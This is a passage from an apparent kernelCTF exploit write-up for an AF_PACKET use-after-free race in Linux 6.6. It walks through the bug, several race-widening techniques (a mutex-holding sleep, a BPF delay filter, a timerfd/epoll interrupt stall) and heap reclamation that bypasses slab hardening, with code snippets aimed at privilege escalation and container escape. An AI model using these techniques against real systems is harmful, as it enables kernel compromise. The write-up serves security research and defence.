arrays allocated via kcalloc(block_nr, sizeof(struct pgv), ...) inside alloc_pg_vec(), so they&#8217;re guaranteed to land in the same random cache.</p><p><strong>CONFIG_SLAB_VIRTUAL</strong> (also known as &#8220;virtual slab&#8221;) ensures that the virtual address range used for one slab cache type is never reused for a different slab cache type.
In a normal kernel, freed slab pages can be returned to the page allocator and reallocated to a completely different slab cache, allowing cross-cache attacks. With CONFIG_SLAB_VIRTUAL, each cache gets a dedicated virtual address range &#8212; an allocation from kmalloc-64 will always map to a kmalloc-64 virtual address, even after being freed and reallocated. If an attacker frees a kmalloc-64 object and tries to reclaim it with a kmalloc-128 object, the virtual addresses won&#8217;t overlap.</p><p>The bypass is the same principle: by reclaiming freed ring buffer memory with another ring buffer (same object type, same slab cache), the virtual addresses remain valid. The exploit doesn&#8217;t need cross-cache attacks &#8212; it uses ring buffers to reclaim ring buffers throughout.</p><p>These mitigations force the exploit author into a disciplined pattern: every reclamation must use the same object type from the same call site. As we&#8217;ll see, this constraint shapes the entire exploit architecture &#8212; from using TX ring buffers to reclaim RX ring buffers, to spraying pgv arrays to reclaim other pgv arrays.</p><h2>The Vulnerability</h2><h3>The Conditional Zeroing Bug</h3><p>The root cause is a logic error in packet_set_ring(). When reconfiguring a ring buffer, this function needs to temporarily unhook the packet socket from the network interface to ensure no packets arrive while the ring buffer is being swapped. Here&#8217;s the relevant code:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;50abf75b-4b4b-4918-86be-344153887ae5&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        int closing, int tx_ring)
{
    // ...
    spin_lock(&amp;po-&gt;bind_lock);
    was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
    num = po-&gt;num;
    if (was_running) {
        WRITE_ONCE(po-&gt;num, 0);    // Only zeroed if was_running!
        __unregister_prot_hook(sk, false);
    }
    spin_unlock(&amp;po-&gt;bind_lock);

    synchronize_net();

    mutex_lock(&amp;po-&gt;pg_vec_lock);
    // ... swap ring buffers, free old ring ...
    mutex_unlock(&amp;po-&gt;pg_vec_lock);

    spin_lock(&amp;po-&gt;bind_lock);
    if (was_running) {
        WRITE_ONCE(po-&gt;num, num);   // Only restored if was_running!
        register_prot_hook(sk);
    }
    spin_unlock(&amp;po-&gt;bind_lock);
}</code></pre></div><p>The critical issue is the if (was_running) conditional around WRITE_ONCE(po-&gt;num, 0). The po-&gt;num field determines the protocol number the socket is registered for. When it&#8217;s non-zero, the NETDEV_UP handler in packet_notifier() will re-register the protocol hook:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;9d3b9bb0-e444-43ed-a899-a7b1c38963c9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">case NETDEV_UP:
    if (dev-&gt;ifindex == po-&gt;ifindex) {
        spin_lock(&amp;po-&gt;bind_lock);
        if (po-&gt;num)                    // &lt;-- checks po-&gt;num
            register_prot_hook(sk);     // re-hooks the socket!
        spin_unlock(&amp;po-&gt;bind_lock);
    }
    break;</code></pre></div><p><strong>The bug</strong>: If the packet socket is <em>not</em> currently running when packet_set_ring() is called, po-&gt;num retains its original non-zero value. After spin_unlock(&amp;po-&gt;bind_lock), there is a window where packet_set_ring() has released the bind lock but has not yet finished reconfiguring the ring buffer. If a NETDEV_UP event arrives during this window, packet_notifier() sees po-&gt;num != 0 and calls register_prot_hook(), re-hooking the socket to the network interface. Now the socket can receive packets while packet_set_ring() is in the middle of freeing and replacing the ring buffer.</p><h3>The Race Window and UAF</h3><p>The exploit triggers the vulnerability through a two-race sequence:</p><p><strong>Race 1: packet_set_ring() vs packet_notifier()</strong></p><p>The attacker ensures the packet socket is bound to a network interface but <em>not</em> running (the interface is DOWN). Then:</p><ol><li><p>Call packet_set_ring() to free the existing RX ring buffer</p></li><li><p>After packet_set_ring() releases bind_lock but before it acquires pg_vec_lock, bring the interface UP</p></li><li><p>packet_notifier() sees po-&gt;num != 0, re-registers the protocol hook</p></li><li><p>The socket is now &#8220;running&#8221; and can receive packets, even though packet_set_ring() hasn&#8217;t finished</p></li></ol><p><strong>Race 2: packet_set_ring() vs tpacket_rcv()</strong></p><p>Now that the hook is registered, sending a packet to the interface triggers tpacket_rcv(). This function reads the ring buffer metadata (prb_bdqc) which still points to the old ring buffer. 
Meanwhile, packet_set_ring() proceeds to free that same ring buffer inside the pg_vec_lock critical section:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;024aaeb0-c1bd-4911-a52f-904014d64833&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">mutex_lock(&amp;po-&gt;pg_vec_lock);
    swap(rb-&gt;pg_vec, pg_vec);     // pg_vec now holds old ring buffer
    // ...
mutex_unlock(&amp;po-&gt;pg_vec_lock);
// ...
free_pg_vec(pg_vec, order, req-&gt;tp_block_nr);  // free the old ring!</code></pre></div><p>If tpacket_rcv() accesses the ring buffer after it has been freed, we have a <strong>use-after-free</strong>. The TPACKET_V3 prb_bdqc structure is particularly useful for exploitation because its pointers to the ring buffer (pkbdq, nxt_offset, pkblk_start, etc.) are <strong>not</strong> zeroed when the ring is freed. The freed pg_vec array has its individual buffer pointers set to NULL by free_pg_vec(), but the prb_bdqc still holds the stale addresses.</p><h2>The Key Insight: Sleeping Mutex Holders Stretch Race Windows</h2><p>The most important takeaway from this exploit &#8212; and a generalizable bug-finding heuristic for kernel security researchers &#8212; is this: <strong>if you can make a mutex holder sleep, you can stretch the time window between any lock release and subsequent lock acquisition to an arbitrary duration</strong>.</p><p>In packet_set_ring(), there&#8217;s a critical gap between releasing bind_lock and acquiring pg_vec_lock:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;ce6e38a4-fe6a-4f7a-a29c-9d36a9505a35&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">spin_unlock(&amp;po-&gt;bind_lock);    // Race 1 window opens
synchronize_net();
mutex_lock(&amp;po-&gt;pg_vec_lock);   // Race 1 window closes</code></pre></div><p>Normally, synchronize_net() completes quickly and mutex_lock() succeeds immediately, making this window very tight. But the pg_vec_lock mutex is also acquired by tpacket_snd():</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;61525ef9-7f41-4ab1-9313-142e21fc56c0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static int tpacket_snd(struct packet_sock *po, struct msghdr *msg)
{
    mutex_lock(&amp;po-&gt;pg_vec_lock);       // holds the mutex
    // ...
    timeo = wait_for_completion_interruptible_timeout(
        &amp;po-&gt;skb_completion, timeo);    // SLEEPS while holding it!
    // ...
    mutex_unlock(&amp;po-&gt;pg_vec_lock);
}</code></pre></div><p>The exploit pre-acquires pg_vec_lock by calling sendmsg() on the victim socket&#8217;s TX ring in a way that reaches wait_for_completion_interruptible_timeout(). This puts the thread to sleep for a configurable duration (set via SO_SNDTIMEO) while holding the mutex. Now packet_set_ring() blocks at mutex_lock(&amp;po-&gt;pg_vec_lock) for a <em>predictable, attacker-controlled</em> period &#8212; in this case, one full second.</p><p>This transforms a nanosecond-scale race window into a one-second window, making the first race essentially <strong>deterministic</strong>: there is ample time to bring the network interface UP and register the protocol hook.</p><p><strong>This pattern generalizes.</strong> When auditing kernel code for race conditions, look for:</p><ol><li><p>A sequence where lock A is released, work happens, then lock B is acquired</p></li><li><p>A separate code path that holds lock B and can sleep (mutexes allow sleeping; spinlocks do not)</p></li><li><p>A way to trigger that sleeping code path before the racing code path</p></li></ol><p>If all three conditions are met, the race window between releasing lock A and acquiring lock B becomes arbitrarily stretchable. Code that appeared &#8220;safe enough&#8221; because the window was tiny becomes trivially exploitable.</p><h2>The Exploit</h2><p>The exploit targets the kernelCTF mitigation-v4-6.6 environment &#8212; Google&#8217;s Container-Optimized OS (COS) with additional kernel security mitigations enabled, running Linux 6.6. It achieves full privilege escalation and container escape. It builds exploit primitives through four stages, each more powerful than the last, culminating in arbitrary kernel memory read/write and shellcode execution.</p><h3>Stage 0: Winning the Races</h3><h4>First Race: Deterministic via Mutex Barrier</h4><p>The &#8220;first race&#8221; isn&#8217;t really a traditional race where two threads sprint and one hopes to win by luck. 
The exploit <strong>eliminates the randomness entirely</strong> by converting it into a deterministic sequence using a mutex as a barrier.</p><p><strong>How tpacket_snd() holds pg_vec_lock while sleeping</strong></p><p>The exploit needs a way to hold the pg_vec_lock mutex for a controlled duration. It finds this in tpacket_snd(), the kernel&#8217;s TX path for packet sockets. Here&#8217;s the relevant code path:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;4239cb2b-b974-4d0e-b406-62c9c6074777&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static int tpacket_snd(struct packet_sock *po, struct msghdr *msg)
{
    bool need_wait = !(msg-&gt;msg_flags &amp; MSG_DONTWAIT);  // [1] controllable

    mutex_lock(&amp;po-&gt;pg_vec_lock);                        // [2] grab the mutex

    // ... validate device is UP, etc ...

    do {
        ph = packet_current_frame(po, &amp;po-&gt;tx_ring, TP_STATUS_SEND_REQUEST);
        if (unlikely(ph == NULL)) {
            if (need_wait &amp;&amp; skb) {                      // [3] need skb != NULL
                timeo = sock_sndtimeo(&amp;po-&gt;sk, ...);    // from SO_SNDTIMEO
                timeo = wait_for_completion_interruptible_timeout(
                    &amp;po-&gt;skb_completion, timeo);         // [4] SLEEP here!
                if (timeo &lt;= 0) {
                    err = !timeo ? -ETIMEDOUT : -ERESTARTSYS;
                    goto out_put;
                }
            }
            continue;
        }

        skb = NULL;
        tp_len = tpacket_parse_header(po, ph, ...);     // [5] read from TX ring
        if (tp_len &lt; 0) goto tpacket_error;

        skb = sock_alloc_send_skb(&amp;po-&gt;sk, ...);        // [6] after this, skb != NULL

        tp_len = tpacket_fill_skb(po, skb, ...);        // [7] can force tp_len &lt; 0
        if (unlikely(tp_len &lt; 0)) {
tpacket_error:
            if (packet_sock_flag(po, PACKET_SOCK_TP_LOSS)) {  // [8]
                __packet_set_status(po, ph, TP_STATUS_AVAILABLE);
                packet_increment_head(&amp;po-&gt;tx_ring);
                kfree_skb(skb);
                continue;                                // [9] loop again!
            }
        }
        // ...
    } while (...);

out:
    mutex_unlock(&amp;po-&gt;pg_vec_lock);                      // [10] finally release
}</code></pre></div><p>The exploit navigates this code path as follows:</p><ol><li><p>Call sendmsg() <strong>without</strong> MSG_DONTWAIT, so need_wait = true.</p></li><li><p>The mutex is acquired at [2].</p></li><li><p>First loop iteration: a TX frame is found (the exploit pre-wrote TP_STATUS_SEND_REQUEST via mmap()). At [5], tpacket_parse_header() reads tp_len from the mmapped ring &#8212; the exploit set tp_len = 1, which is too small, causing tpacket_fill_skb() at [7] to return a negative error. But first, sock_alloc_send_skb() at [6] sets skb != NULL.</p></li><li><p>The PACKET_SOCK_TP_LOSS flag is set (via setsockopt(PACKET_LOSS)), so we hit [8] &#8594; [9] and continue back to the top of the loop.</p></li><li><p>Second loop iteration: no more frames with TP_STATUS_SEND_REQUEST, so ph == NULL. Now need_wait == true and skb != NULL (from the first iteration&#8217;s allocation), so we enter [3] &#8594; [4]: wait_for_completion_interruptible_timeout(). <strong>The thread sleeps for SO_SNDTIMEO duration (1 second) while holding pg_vec_lock.</strong></p></li></ol><p>There&#8217;s a subtlety: sock_alloc_send_skb() checks sk-&gt;sk_err and returns NULL if it&#8217;s set. When the interface goes DOWN, packet_notifier() sets sk-&gt;sk_err = ENETDOWN. Since the exploit needs the interface to be DOWN later for the bug trigger, it must ensure the interface is still UP when tpacket_snd() runs. The ordering matters.</p><p><strong>The deterministic sequence</strong></p><p><strong>Setup: the dummy interface and victim socket.</strong> The exploit runs inside a user namespace (for CAP_NET_RAW) and a network namespace (for a controlled network environment). It creates a dummy network interface named &#8220;pwn_dummy&#8221; via netlink (RTM_NEWLINK with IFLA_INFO_KIND = &#8220;dummy&#8221;), sets its MTU to IPV6_MIN_MTU - 1 (1279 bytes), and brings it UP via ioctl(SIOCSIFFLAGS, IFF_UP | IFF_RUNNING). 
A dummy interface is ideal because it&#8217;s a pure software device &#8212; packets sent to it are immediately looped back to the protocol handler, so the exploit doesn&#8217;t need any real hardware or network traffic.</p><p>The exploit then creates the <strong>victim packet socket</strong> &#8212; an AF_PACKET/SOCK_RAW socket bound to this dummy interface with sll_protocol = htons(ETH_P_ALL) (receive all protocol types). The socket is configured with TPACKET_V3 ring buffers (both TX and RX), PACKET_LOSS enabled, SO_SNDTIMEO set to 1 second, PACKET_RESERVE set to 38, and a 700-instruction BPF filter attached. The RX ring is the one that will be freed during the race; the TX ring provides the frame needed for the tpacket_snd() sleep trick. At this point, the victim socket is UP and actively receiving packets &#8212; the starting state needed for the exploit.</p><p><strong>Worker threads.</strong> The exploit creates three worker threads:</p><ul><li><p><strong>pg_vec_lock_thread</strong> (CPU 0, nice = 19 &#8212; lowest priority): Holds the mutex</p></li><li><p><strong>pg_vec_buffer_thread</strong> (CPU 0, normal priority): Runs packet_set_ring() to free the ring buffer</p></li><li><p><strong>tpacket_rcv_thread</strong> (CPU 1): Sends the packet that triggers the UAF</p></li></ul><p>The pg_vec_buffer_thread has higher priority than pg_vec_lock_thread on the same CPU. This is critical for the second race&#8217;s timing. Both threads are pinned to CPU 0, so only one can run at a time. When tpacket_snd() in pg_vec_lock_thread calls mutex_unlock(&amp;po-&gt;pg_vec_lock), the CFS (Completely Fair Scheduler) &#8212; Linux&#8217;s default process scheduler, which allocates CPU time proportionally based on priority &#8212; sees that the woken pg_vec_buffer_thread (nice=0) has higher priority than the running pg_vec_lock_thread (nice=19, the lowest possible priority) and <strong>immediately preempts</strong> it. 
This means packet_set_ring() resumes without delay &#8212; it frees the old ring buffer pages, and the same thread immediately reclaims them with alloc_pages(). This matters because over on CPU 1, tpacket_rcv() is frozen by the timer interrupt, and that freeze has a finite duration. The entire free-and-reclaim sequence on CPU 0 must complete before the interrupt returns on CPU 1. If pg_vec_lock_thread continued running after the mutex release (burning CPU 0 time on irrelevant cleanup), the reclamation might not finish in time &#8212; causing a NULL dereference crash instead of a controlled UAF.</p><p>The orchestration proceeds step by step:</p><p><strong>Step 1: Lock the mutex.</strong> Main thread sends work to pg_vec_lock_thread, which calls sendmsg() &#8594; enters tpacket_snd() &#8594; acquires po-&gt;pg_vec_lock &#8594; reaches wait_for_completion_interruptible_timeout() &#8594; sleeps. Main thread polls /proc/[tid]/stat until the thread state is S (sleeping), then records pg_vec_lock_acquire_time via clock_gettime(CLOCK_MONOTONIC).</p><p><strong>Step 2: Bring the interface DOWN.</strong> Main thread calls ioctl(SIOCSIFFLAGS) to set the interface DOWN. This triggers packet_notifier() with NETDEV_DOWN, which unhooks the victim socket (sets PACKET_SOCK_RUNNING = false). The socket is no longer running, but po-&gt;num is still non-zero.</p><p><strong>Step 3: Trigger packet_set_ring().</strong> Main thread sends work to pg_vec_buffer_thread, which calls setsockopt(PACKET_RX_RING, {tp_block_nr=0}). 
This enters the free path of packet_set_ring():</p><ul><li><p>spin_lock(&amp;po-&gt;bind_lock)</p></li><li><p>was_running = false (interface is DOWN)</p></li><li><p>num = po-&gt;num (non-zero &#8212; <strong>this is the bug</strong>)</p></li><li><p>if (was_running) is false &#8594; <strong>po-&gt;num is NOT zeroed</strong></p></li><li><p>spin_unlock(&amp;po-&gt;bind_lock) &#8212; the race window opens</p></li><li><p>synchronize_net() &#8212; brief wait</p></li><li><p>mutex_lock(&amp;po-&gt;pg_vec_lock) &#8212; <strong>BLOCKS</strong> because pg_vec_lock_thread holds it</p></li></ul><p>Main thread polls /proc/[tid]/stat until pg_vec_buffer_thread is sleeping. <strong>This confirms that packet_set_ring() has passed the vulnerable bind_lock section and is now blocked on the mutex.</strong></p><p><strong>Step 4: Bring the interface UP.</strong> Main thread calls ioctl(SIOCSIFFLAGS) to set the interface UP. This triggers packet_notifier() with NETDEV_UP:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;1f8e52f6-afc6-4b4c-9a2a-14c563c23bd9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">case NETDEV_UP:
    spin_lock(&amp;po-&gt;bind_lock);
    if (po-&gt;num)                  // non-zero &#8212; the bug!
        register_prot_hook(sk);   // re-hooks the socket!
    spin_unlock(&amp;po-&gt;bind_lock);</code></pre></div><p><strong>The first race is won.</strong> The victim socket is now hooked to the interface again &#8212; it will receive packets via tpacket_rcv() &#8212; but packet_set_ring() is frozen at the mutex, waiting to free the old ring buffer. There was no race to win; the exploit verified each state transition before proceeding to the next.</p><h4>Second Race: Probabilistic but Enhanced with Three Timing Mechanisms</h4><p>After winning the first race, the exploit has achieved this state:</p><ul><li><p>The victim socket is <strong>hooked to the network interface</strong> (receiving packets via tpacket_rcv())</p></li><li><p>packet_set_ring() is <strong>frozen</strong>, blocked on po-&gt;pg_vec_lock held by the sleeping pg_vec_lock_thread</p></li><li><p>The pg_vec_lock_thread will wake up after exactly 1 second (the SO_SNDTIMEO timeout)</p></li></ul><p>When the timeout expires and pg_vec_lock_thread releases the mutex, packet_set_ring() resumes. Inside the pg_vec_lock critical section, it does two things: (1) swaps rb-&gt;pg_vec to NULL, and (2) <strong>changes the protocol hook function from tpacket_rcv to packet_rcv</strong>. After releasing the mutex, it calls free_pg_vec() to free the old ring buffer pages.</p><p>This hook change is what makes the second race necessary. Once packet_set_ring() switches the hook to packet_rcv, any <em>new</em> packet arriving at the socket will be dispatched to packet_rcv() instead of tpacket_rcv() &#8212; and packet_rcv() doesn&#8217;t use the ring buffer at all, so there&#8217;s no UAF. The exploit cannot simply wait until the ring buffer is freed and then send a packet; by that point, the hook has already been changed.</p><p>The only way to get tpacket_rcv() to access freed memory is to have it <strong>already dispatched</strong> before the hook is changed. The network stack resolves the hook function pointer at packet dispatch time. 
If a packet is sent to the interface and tpacket_rcv() is called <em>before</em> packet_set_ring() swaps the hook, then tpacket_rcv() will continue executing its code path &#8212; including accessing the ring buffer &#8212; regardless of what packet_set_ring() does afterward. The function is already on the call stack; the hook pointer swap only affects future packets.</p><p>So the second race is about getting tpacket_rcv() to be <strong>dispatched</strong> <em>before</em> packet_set_ring() changes the hook, and then having tpacket_rcv() dereference the ring buffer pages <em>after</em> packet_set_ring() has freed them. The exploit uses three independent timing mechanisms stacked together to hit this window.</p><p><strong>Mechanism 1: Calculated Sleep</strong></p><p>The exploit knows exactly when the mutex will be released:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;459a9715-9cec-45e1-8b29-b70f557e6efc&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">pg_vec_lock_release_time = pg_vec_lock_acquire_time + sndtimeo  // +1 second</code></pre></div><p>The tpacket_rcv_thread receives this timestamp and sleeps until just <strong>before</strong> the release:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;0074264e-c346-46ba-a45c-e2d8cdac0110&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// In tpacket_rcv_thread_fn:
struct timespec sleep_duration = timespec_sub(
    remaining_time_before_pg_vec_lock_release,
    work-&gt;decrease_tpacket_rcv_thread_sleep_time  // 5000 ns = 5&#956;s
);
syscall(SYS_nanosleep, &amp;sleep_duration, NULL);
syscall(SYS_sendmsg, trigger_sendmsg_packet_socket, work-&gt;msg, 0);</code></pre></div><p>The thread wakes up ~5 microseconds before the mutex releases and immediately sends the packet via packet_sendmsg_spkt() &#8212; chosen because it has the shortest code path from sendmsg() to dev_queue_xmit() to the protocol hook. The packet traverses the network stack and arrives at tpacket_rcv() on the victim socket.</p><p><strong>Mechanism 2: BPF Filter Delay</strong></p><p>A 700-instruction classic BPF filter is attached to the victim socket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;b2003109-95a6-4a22-851f-82a2905b593e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct sock_filter filter[700];
for (int i = 0; i &lt; 699; i++) {
    filter[i].code = BPF_LD | BPF_IMM;
    filter[i].k = 0xcafebabe;          // load immediate &#8212; cheap but not free
}
filter[699].code = BPF_RET | BPF_K;
filter[699].k = sizeof(size_t);        // return truncated length = 8 bytes</code></pre></div><p>When the packet arrives and tpacket_rcv() is invoked, it calls run_filter() early in its execution &#8212; <strong>before</strong> it ever touches pkc-&gt;pkbdq or any ring buffer pointer. The filter executes all 700 instructions, burning CPU time. During this window, CPU 0 is free to run packet_set_ring(), free the ring buffer, and reclaim it. The final BPF_RET instruction also serves a second purpose: it truncates the packet&#8217;s &#8220;snapshot length&#8221; to exactly 8 bytes (or sizeof(void *)) &#8212; the precise number of bytes the exploit wants to overwrite in the overflow target.</p><p><strong>Mechanism 3: Timer Interrupt Lengthening (Jann Horn&#8217;s Technique)</strong></p><p>The BPF filter alone buys only microseconds. The exploit needs to <strong>pause tpacket_rcv() on CPU 1 for much longer</strong> &#8212; long enough for packet_set_ring() on CPU 0 to not only free the ring buffer but also for the reclamation allocation to complete. This is where the timer interrupt technique comes in.</p><p><strong>Background: timerfd, epoll, and wait queues.</strong> The Linux timerfd_create() syscall creates a file descriptor that delivers timer expiration notifications. Internally, the kernel allocates a timerfd_ctx structure containing an hrtimer (high-resolution timer) and a wait_queue_head (wqh). When the timer fires, the kernel&#8217;s hrtimer interrupt handler calls timerfd_tmrproc(), which wakes up all waiters on wqh.</p><p>The epoll subsystem is how waiters get added to wqh. When you call epoll_ctl(EPOLL_CTL_ADD) to monitor a timerfd, the kernel calls ep_ptable_queue_proc(), which allocates a wait_queue_entry and adds it to the timerfd&#8217;s wqh via add_wait_queue(). Each epoll_ctl() call on a different file descriptor pointing to the same timerfd adds <strong>one more entry</strong> to this wait queue. 
So the key insight is: <strong>a single timerfd can accumulate an arbitrarily large wait queue by monitoring many dup()&#8217;d copies of it through epoll.</strong></p><p>When the timer fires, the interrupt handler must walk the entire wait queue under spin_lock_irqsave &#8212; meaning interrupts are disabled and the CPU cannot be preempted until every entry is processed. This turns the wait queue length into a <strong>controllable CPU stall duration</strong>.</p><p><strong>The file descriptor table constraint.</strong> In the kernelCTF environment, each process is limited to 4,096 file descriptors (RLIMIT_NOFILE). The exploit first raises rlim_cur to rlim_max (4,096) via setrlimit(). Even so, 4,096 wait queue entries isn&#8217;t enough to stall the CPU for the required duration. The exploit works around this by creating 180 threads, each with its own <strong>private file descriptor table</strong>:</p><p><em>Setup phase</em> &#8212; During initialization, the exploit creates 180 timerfd_waitlist_thread threads. 
Each thread:</p><ol><li><p>Is pinned to <strong>CPU 1</strong> (same CPU as tpacket_rcv_thread)</p></li><li><p>Calls unshare(CLONE_FILES) to get its own private file descriptor table &#8212; this is the key trick that multiplies the FD limit, since each thread now has its own independent table of 4,096 slots</p></li><li><p>Closes stdin, stdout, and stderr to free up three more slots</p></li><li><p>Creates an epollfd (uses one slot)</p></li><li><p>Calls dup(timerfd) in a loop until the FD table is full &#8212; the original timerfd (created by the main thread before unshare) is still accessible, and each dup() creates a new file descriptor pointing to the same underlying timerfd_ctx</p></li><li><p>Calls epoll_ctl(EPOLL_CTL_ADD) for each duplicated FD, adding a wait queue entry to the timerfd&#8217;s wqh for every one</p></li></ol><p>Each epoll_ctl() call adds a wait_queue_entry to the timerfd&#8217;s internal wait queue via ep_ptable_queue_proc() &#8594; add_wait_queue(). With 180 threads &#215; ~4,000 FDs each, the timerfd&#8217;s wait queue accumulates roughly <strong>720,000 entries</strong>.</p><p><em>Firing phase</em> &#8212; The exploit arms the timer from CPU 1 (important &#8212; timerfd_settime() binds the hrtimer to the calling CPU):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;e4a701e7-acf7-4212-a0f3-77298e6180bb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct itimerspec settime_value = {};
settime_value.it_value = timespec_add(pg_vec_lock_release_time,
                                       timer_interrupt_amplitude);  // +150&#956;s
timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &amp;settime_value, NULL);</code></pre></div><p>When the timer fires on CPU 1, the kernel interrupt handler executes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;f3c4920a-0d77-4247-abc1-4f4a18e72ec3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">timerfd_tmrproc()
  &#8594; timerfd_triggered()
    &#8594; spin_lock_irqsave(&amp;ctx-&gt;wqh.lock, flags)   // interrupts disabled!
    &#8594; wake_up_locked_poll()
      &#8594; __wake_up_common()                         // walks the waitqueue
        &#8594; list_for_each_entry_safe_from(...)       // 720,000 entries!
          &#8594; ep_poll_callback()                     // called for each entry
    &#8594; spin_unlock_irqrestore(...)</code></pre></div><p>The __wake_up_common() function iterates through all 720,000 wait queue entries, calling ep_poll_callback() for each one. This entire loop runs inside spin_lock_irqsave &#8212; meaning <strong>interrupts are disabled and preemption is impossible</strong>. If tpacket_rcv() was executing on CPU 1 when the interrupt fired, it is <strong>completely frozen</strong> until the interrupt handler finishes walking the entire list. This takes hundreds of microseconds to milliseconds &#8212; more than enough time for packet_set_ring() on CPU 0 to free the ring buffer and for pg_vec_buffer_thread to reclaim it with a new ring buffer.</p><p>The exploit retries this entire sequence if the race is lost (detected by checking whether the overflow actually corrupted the target object). In practice, the combination of precise sleep timing, BPF filter delay, and the massive timer interrupt provides a high success rate.</p><h3>Stage 1: Page Overflow Primitive (via xattr corruption)</h3><p>After winning both races, the exploit needs to turn the UAF into something useful. This stage has three parts: reclaiming the freed ring buffer to prevent a kernel panic, arranging the heap so the reclaimed buffer is adjacent to a victim object, and engineering a precise overflow that corrupts exactly the right field.</p><h4>Part 1: Reclaiming the freed pgv array</h4><p>The key challenge is that free_pg_vec() zeroes out all buffer pointers in the pgv array after freeing it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;6ec2e036-cb47-4b11-9fb4-2ac8bef15d1f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static void free_pg_vec(struct pgv *pg_vec, unsigned int order, unsigned int len)
{
    int i;
    for (i = 0; i &lt; len; i++) {
        if (pg_vec[i].buffer) {
            free_pages((unsigned long)pg_vec[i].buffer, order);
            pg_vec[i].buffer = NULL;  // zeroed!
        }
    }
    kfree(pg_vec);
}</code></pre></div><p>If tpacket_rcv() reads a zeroed buffer pointer, it dereferences NULL and the kernel panics. The exploit must <strong>reclaim</strong> the freed pgv array &#8212; replace it in memory with a new pgv array containing valid buffer pointers &#8212; before tpacket_rcv() gets past the BPF filter and the timer interrupt and accesses it.</p><p>This is handled by pg_vec_buffer_thread, which runs on CPU 0 alongside packet_set_ring(). Immediately after packet_set_ring() frees the victim&#8217;s ring buffer, the same thread allocates a new TX ring buffer on a different packet socket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;2a70493e-9a0e-4568-a08f-d29d642dc334&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// In pg_vec_buffer_thread_fn:
// Step 1: Free victim RX ring
setsockopt(victim_fd, SOL_PACKET, PACKET_RX_RING, &amp;free_req, sizeof(free_req));
// Step 2: Immediately reclaim with a new TX ring
alloc_pages(reclaim_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE);</code></pre></div><p>The alloc_pages() function used throughout the exploit is a helper that allocates kernel pages by creating a TX ring buffer on a packet socket. It calls setsockopt(PACKET_TX_RING) with the specified block count and block size, which triggers packet_set_ring() &#8594; alloc_pg_vec() in the kernel &#8212; allocating both a pgv array and the requested number of page blocks. The corresponding free_pages() helper calls setsockopt(PACKET_TX_RING) with all-zero parameters, triggering the free path. This gives the exploit precise control over kernel page allocations and frees through a simple userspace API: each packet socket can hold one TX ring, and creating or destroying that ring allocates or frees pages of the exact size the exploit needs.</p><p>The reclamation ring has the <strong>same number of blocks</strong> as the victim (2 blocks &#8212; MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16 = 2) so the pgv array is the same size: kcalloc(2, sizeof(struct pgv)) = kcalloc(2, 8) = 16 bytes. The size match is essential because of the two heap mitigations.</p><p>CONFIG_RANDOM_KMALLOC_CACHES selects the slab cache by hashing the <strong>call site</strong> address &#8212; both pgv arrays are allocated by the same kcalloc() inside alloc_pg_vec(), so they hash to the same random cache. But this only works if they&#8217;re also in the <strong>same size class</strong>: if the reclamation used 4 blocks (32 bytes &#8594; kmalloc-32) instead of 2 blocks (16 bytes &#8594; kmalloc-16), it would go to a different slab cache entirely. CONFIG_SLAB_VIRTUAL enforces that each slab cache gets a dedicated virtual address range &#8212; a freed kmalloc-16 slot can only be reused by another kmalloc-16 allocation. 
